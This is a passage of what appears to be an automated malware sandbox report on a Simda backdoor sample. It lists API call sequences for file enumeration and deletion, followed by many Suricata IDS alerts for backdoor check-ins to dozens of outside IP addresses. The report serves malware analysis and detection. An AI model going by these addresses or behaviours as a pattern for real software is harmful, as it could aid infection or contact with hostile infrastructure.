Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01267CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_01267CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_0126BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,6_2_0126BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_012466D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_012466D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105D189
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105D0C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105BB20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0105BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,7_2_0105BBE9
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01067CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,7_2_01067CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_0106BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,7_2_0106BE40
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_010466D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,7_2_010466D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3D0C0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3D0C0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3D189 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3D189
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3BBE9 GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3BBE9
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A3BB20 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,FindNextFileA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,SetErrorMode,9_2_00A3BB20
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A47CE0 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,9_2_00A47CE0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A266D0 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,9_2_00A266D0
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A4BE40 memset,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,9_2_00A4BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C9C3DB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02C9C3DB

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49717 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49721 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49715 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49714 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49718 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49724 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.6:63778
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49728 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49720 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49723 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49725 -> 85.17.31.122:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49726 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49787 -> 76.223.67.189:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49753 -> 103.150.10.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49722 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49719 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49739 -> 13.248.169.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49729 -> 85.17.31.122:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49795 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49745 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49746 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49716 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49794 -> 103.224.212.210:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49740 -> 188.114.97.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49786 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49796 -> 154.85.183.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49829 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49793 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49822 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:49821 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53377 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54642 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53361 -> 52.34.198.229:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53397 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54648 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54643 -> 85.17.31.122:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54646 -> 85.17.31.122:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53774 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.6:58475
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52149 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52150 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50219 -> 178.162.203.226:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54725 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52123 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52164 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53772 -> 162.255.119.102:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50217 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53776 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53764 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53773 -> 99.83.170.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52172 -> 99.83.170.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50235 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50236 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52145 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52122 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53766 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52133 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52119 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50238 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50228 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59198 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52125 -> 178.162.203.226:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52128 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52147 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50242 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50216 -> 91.195.240.19:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:53777 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54644 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:54724 -> 103.224.212.210:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50241 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50215 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50239 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50244 -> 178.162.203.226:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50226 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59215 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50243 -> 162.255.119.102:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59213 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59212 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59238 -> 178.162.203.226:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59192 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59236 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59207 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59250 -> 91.195.240.19:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59221 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59199 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50234 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59239 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52146 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59204 -> 178.162.203.226:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59205 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52121 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52170 -> 91.195.240.19:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59195 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59216 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59200 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59208 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59223 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59203 -> 162.255.119.102:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52129 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59233 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52163 -> 178.162.203.226:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50246 -> 91.195.240.19:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50218 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59220 -> 162.255.119.102:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59214 -> 178.162.203.226:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59222 -> 99.83.170.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59219 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59196 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59235 -> 99.83.170.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59226 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52126 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:50227 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59197 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59225 -> 162.255.119.102:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59241 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59237 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59218 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:52124 -> 162.255.119.102:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.6:59206 -> 99.83.170.3:80
